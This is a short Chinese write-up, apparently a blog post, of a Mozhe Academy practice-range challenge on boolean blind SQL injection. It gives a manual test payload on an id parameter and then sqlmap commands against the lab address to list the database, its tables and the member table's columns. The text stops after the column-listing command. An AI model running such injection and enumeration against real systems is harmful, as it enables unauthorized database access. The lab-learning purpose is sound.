-
启动靶场,熟悉的界面
-
点击登录下方的维护通知
-
地址栏醒目的id出现了,尝试一下id =1’ and 1=1,空白页面
-
直接开kali,上sqlmap
输入sqlmap -u http://219.153.49.228:45239/new_list.php?id=1 --current -db
得到数据库名称:stormgroup -
输入 sqlmap -u http://219.153.49.228:47334/new_list.php?id=1 -D stormgroup --tables (这里地址和上面不一样是因为 为了记录过程我又重新开了靶场,但是我懒得改地址了……)
输出 两个表格member和notice 显然看一下member
-
输入 sqlmap -u http://219.153.49.228:47334/new_list.php?id=1 -D stormgroup -T member --columns
输出
墨者学院——SQL注入漏洞测试(布尔盲注)
于 2022-01-11 10:49:39 首次发布